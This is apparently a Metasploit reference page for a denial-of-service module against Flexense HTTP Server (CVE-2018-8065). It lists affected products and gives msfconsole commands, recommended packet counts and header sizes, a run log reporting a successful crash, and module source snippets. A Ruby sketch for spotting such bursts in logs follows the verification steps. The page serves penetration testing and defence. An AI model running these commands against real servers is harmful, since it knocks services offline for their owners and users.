Flexense HTTP Server Denial Of Service - Metasploit
This page contains detailed information about how to use the auxiliary/dos/http/flexense_http_server_dos Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Flexense HTTP Server Denial Of Service
Module: auxiliary/dos/http/flexense_http_server_dos
Source code: modules/auxiliary/dos/http/flexense_http_server_dos.rb
Disclosure date: 2018-03-09
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 80
List of CVEs: CVE-2018-8065
This module triggers a denial-of-service vulnerability in the Flexense HTTP server. The vulnerability is caused by a user-mode write access memory violation and can be triggered by rapidly sending a variety of HTTP requests with long HTTP header values. Multiple Flexense applications that use Flexense HTTP server 10.6.24 and earlier versions are reportedly vulnerable.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/dos/http/flexense_http_server_dos
msf auxiliary(flexense_http_server_dos) > show targets
... a list of targets ...
msf auxiliary(flexense_http_server_dos) > set TARGET target-id
msf auxiliary(flexense_http_server_dos) > show options
... show and set options ...
msf auxiliary(flexense_http_server_dos) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Description
This module triggers a denial-of-service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger a write access memory violation by rapidly sending HTTP requests with large HTTP header values.
According to the public exploit disclosure for Flexense HTTP Server v10.6.24, the following software is vulnerable to denial of service. Read more: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065
- DiskBoss Enterprise <= v9.0.18
- Sync Breeze Enterprise <= v10.6.24
- Disk Pulse Enterprise <= v10.6.24
- Disk Savvy Enterprise <= v10.6.24
- Dup Scout Enterprise <= v10.6.24
- VX Search Enterprise <= v10.6.24
Vulnerable Application Link
- http://www.diskboss.com/downloads.html
- http://www.syncbreeze.com/downloads.html
- http://www.diskpulse.com/downloads.html
- http://www.disksavvy.com/downloads.html
- http://www.dupscout.com/downloads.html
Installation Setup
All Flexense applications that are listed above can be installed by following these steps.
- Download the application: https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe
- Follow the Sync Breeze Enterprise v10.6.24 Setup Wizard
- After the installation, navigate to: Options->Server
- Check the box saying: Enable web server on port:...
Verification Steps
- Install the application
- Start msfconsole
- Do:
use auxiliary/dos/http/flexense_http_server_dos
- Do:
set rport <port>
- Do:
set rhost <ip>
- Do:
check
[+] 192.168.1.20:80 The target is vulnerable.
- Do:
run
- Web server will crash after 200-1000 requests, depending on the OS version and system memory.
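The traffic this page describes (many requests in quick succession, each with an Accept header in the 4088-5090 byte range) stands out in proxy or sensor logs. The Ruby sketch below is an added example, not code from the module or the original page; the log format, the 60-second window and all function names are assumptions, and the sample lines are constructed.

```ruby
require 'time'

MIN_ACCEPT_BYTES = 4088 # lower bound of the PacketSize range listed on this page
BURST_COUNT      = 200  # the page reports crashes after 200-1000 requests
WINDOW_SECONDS   = 60   # assumed sliding-window length

# Hypothetical log format: "<ISO 8601 time> <source IP> accept_len=<bytes>"
LINE_RE = /\A(\S+)\s+(\S+)\s+accept_len=(\d+)\z/

# Parse one log line; returns nil for anything malformed.
def parse_line(line)
  m = LINE_RE.match(line.strip)
  return nil unless m
  { time: Time.iso8601(m[1]), src: m[2], accept_len: m[3].to_i }
rescue ArgumentError
  nil
end

# { source => peak } for sources with >= burst oversized requests in any window.
def flag_sources(lines, min_bytes: MIN_ACCEPT_BYTES, burst: BURST_COUNT, window: WINDOW_SECONDS)
  by_src = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    e = parse_line(line)
    by_src[e[:src]] << e[:time] if e && e[:accept_len] >= min_bytes
  end
  by_src.each_with_object({}) do |(src, times), flagged|
    times.sort!
    left = peak = 0
    times.each_with_index do |t, right|
      left += 1 while t - times[left] > window # shrink window from the left
      peak = [peak, right - left + 1].max
    end
    flagged[src] = peak if peak >= burst
  end
end

# Constructed sample: one burst source, one normal client, one slow sender.
def sample_log
  base = Time.utc(2018, 3, 9, 12, 0, 0)
  line = ->(offset, ip, len) { "#{(base + offset).iso8601(3)} #{ip} accept_len=#{len}" }
  lines = (0...250).flat_map do |i|
    [line.(Rational(i, 10), '203.0.113.7', 4659), # 250 requests in 25 s
     line.(i, '198.51.100.4', 96),                # ordinary header size
     line.(i * 30, '192.0.2.9', 4700)]            # oversized but slow
  end
  lines << 'garbage line' # malformed entry, must be ignored
end

p flag_sources(sample_log) if __FILE__ == $PROGRAM_NAME
```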
Scenarios
WINDOWS 7/10
msf5 > use auxiliary/dos/http/flexense_http_server_dos
msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80
rport => 80
msf5 auxiliary(dos/http/flexense_http_server_dos) > run
[*] 192.168.1.20:80 - Triggering the vulnerability
[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down !
[*] Auxiliary module execution completed
Msfconsole Usage
Here is how the dos/http/flexense_http_server_dos auxiliary module looks in the msfconsole:
msf6 > use auxiliary/dos/http/flexense_http_server_dos
msf6 auxiliary(dos/http/flexense_http_server_dos) > show info
Name: Flexense HTTP Server Denial Of Service
Module: auxiliary/dos/http/flexense_http_server_dos
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2018-03-09
Provided by:
Ege Balci <[email protected]>
Check supported:
Yes
Basic options:
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
PacketCount  1725             yes       The number of packets to be sent (Recommended: Above 1725)
PacketSize   4659             yes       The number of bytes in the Accept header (Recommended: 4088-5090
RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT        80               yes       The target port (TCP)
Description:
This module triggers a Denial of Service vulnerability in the
Flexense HTTP server. Vulnerability caused by a user mode write
access memory violation and can be triggered with rapidly sending
variety of HTTP requests with long HTTP header values. Multiple
Flexense applications that are using Flexense HTTP server 10.6.24
and below vesions reportedly vulnerable.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-8065
https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS
Module Options
This is a complete list of options available in the dos/http/flexense_http_server_dos auxiliary module:
msf6 auxiliary(dos/http/flexense_http_server_dos) > show options
Module options (auxiliary/dos/http/flexense_http_server_dos):
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
PacketCount  1725             yes       The number of packets to be sent (Recommended: Above 1725)
PacketSize   4659             yes       The number of bytes in the Accept header (Recommended: 4088-5090
RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT        80               yes       The target port (TCP)
Advanced Options
Here is a complete list of advanced options supported by the dos/http/flexense_http_server_dos auxiliary module:
msf6 auxiliary(dos/http/flexense_http_server_dos) > show advanced
Module advanced options (auxiliary/dos/http/flexense_http_server_dos):
Name            Current Setting  Required  Description
----            ---------------  --------  -----------
CHOST                            no        The local client address
CPORT                            no        The local client port
ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
SSL             false            no        Negotiate SSL/TLS for outgoing connections
SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE         false            no        Enable detailed status messages
WORKSPACE                        no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the dos/http/flexense_http_server_dos module can do:
msf6 auxiliary(dos/http/flexense_http_server_dos) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the dos/http/flexense_http_server_dos auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(dos/http/flexense_http_server_dos) > show evasion
Module evasion options:
Name                Current Setting  Required  Description
----                ---------------  --------  -----------
TCP::max_send_size  0                no        Maxiumum tcp segment size. (0 = disable)
TCP::send_delay     0                no        Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target refused the connection
Here is a relevant code snippet related to the "Target refused the connection" error message:
    Exploit::CheckCode::Appears
  else
    Exploit::CheckCode::Safe
  end
rescue Rex::ConnectionRefused
  print_error("Target refused the connection")
  Exploit::CheckCode::Unknown
rescue
  print_error("Target did not respond to HTTP request")
  Exploit::CheckCode::Unknown
end
Target did not respond to HTTP request
Here is a relevant code snippet related to the "Target did not respond to HTTP request" error message:
    end
  rescue Rex::ConnectionRefused
    print_error("Target refused the connection")
    Exploit::CheckCode::Unknown
  rescue
    print_error("Target did not respond to HTTP request")
    Exploit::CheckCode::Unknown
  end
end

def run
Target is not vulnerable.
Here is a relevant code snippet related to the "Target is not vulnerable." error message:
  end
end

def run
  unless check == Exploit::CheckCode::Appears
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
  end

  size = datastore['PacketSize'].to_i
  print_status("Starting with packets of #{size}-byte strings")
Invalid destination! Continuing...
Here is a relevant code snippet related to the "Invalid destination! Continuing..." error message:
  sock.put(payload)
  disconnect
  count += 1
  break if count==datastore['PacketCount']
rescue ::Rex::InvalidDestination
  print_error('Invalid destination! Continuing...')
rescue ::Rex::ConnectionTimeout
  print_error('Connection timeout! Continuing...')
rescue ::Errno::ECONNRESET
  print_error('Connection reset! Continuing...')
rescue ::Rex::ConnectionRefused
Connection timeout! Continuing...
Here is a relevant code snippet related to the "Connection timeout! Continuing..." error message:
  count += 1
  break if count==datastore['PacketCount']
rescue ::Rex::InvalidDestination
  print_error('Invalid destination! Continuing...')
rescue ::Rex::ConnectionTimeout
  print_error('Connection timeout! Continuing...')
rescue ::Errno::ECONNRESET
  print_error('Connection reset! Continuing...')
rescue ::Rex::ConnectionRefused
  print_good("DoS successful after #{count} packets with #{size}-byte headers")
  return true
Connection reset! Continuing...
Here is a relevant code snippet related to the "Connection reset! Continuing..." error message:
  rescue ::Rex::InvalidDestination
    print_error('Invalid destination! Continuing...')
  rescue ::Rex::ConnectionTimeout
    print_error('Connection timeout! Continuing...')
  rescue ::Errno::ECONNRESET
    print_error('Connection reset! Continuing...')
  rescue ::Rex::ConnectionRefused
    print_good("DoS successful after #{count} packets with #{size}-byte headers")
    return true
  end
end
DoS failed after <COUNT> packets of <SIZE>-byte strings
Here is a relevant code snippet related to the "DoS failed after <COUNT> packets of <SIZE>-byte strings" error message:
        print_error('Connection timeout! Continuing...')
      rescue ::Errno::ECONNRESET
        print_error('Connection reset! Continuing...')
      rescue ::Rex::ConnectionRefused
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
        return true
      end
    end
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
  end
end
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #9701 Merged Pull Request: Flexense HTTP Server <= 10.6.24 DOS
See Also
Check also the following modules related to this module:
- auxiliary/dos/http/3com_superstack_switch
- auxiliary/dos/http/apache_commons_fileupload_dos
- auxiliary/dos/http/apache_mod_isapi
- auxiliary/dos/http/apache_range_dos
- auxiliary/dos/http/apache_tomcat_transfer_encoding
- auxiliary/dos/http/brother_debut_dos
- auxiliary/dos/http/cable_haunt_websocket_dos
- auxiliary/dos/http/canon_wireless_printer
- auxiliary/dos/http/dell_openmanage_post
- auxiliary/dos/http/f5_bigip_apm_max_sessions
- auxiliary/dos/http/gzip_bomb_dos
- auxiliary/dos/http/hashcollision_dos
- auxiliary/dos/http/ibm_lotus_notes
- auxiliary/dos/http/ibm_lotus_notes2
- auxiliary/dos/http/marked_redos
- auxiliary/dos/http/metasploit_httphandler_dos
- auxiliary/dos/http/monkey_headers
- auxiliary/dos/http/ms15_034_ulonglongadd
- auxiliary/dos/http/nodejs_pipelining
- auxiliary/dos/http/novell_file_reporter_heap_bof
- auxiliary/dos/http/rails_action_view
- auxiliary/dos/http/rails_json_float_dos
- auxiliary/dos/http/slowloris
- auxiliary/dos/http/sonicwall_ssl_format
- auxiliary/dos/http/squid_range_dos
- auxiliary/dos/http/tautulli_shutdown_exec
- auxiliary/dos/http/ua_parser_js_redos
- auxiliary/dos/http/webkitplus
- auxiliary/dos/http/webrick_regex
- auxiliary/dos/http/wordpress_directory_traversal_dos
- auxiliary/dos/http/wordpress_long_password_dos
- auxiliary/dos/http/wordpress_xmlrpc_dos
- auxiliary/dos/http/ws_dos
- auxiliary/dos/scada/igss9_dataserver
- auxiliary/dos/windows/ftp/filezilla_server_port
Authors
- Ege Balci
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.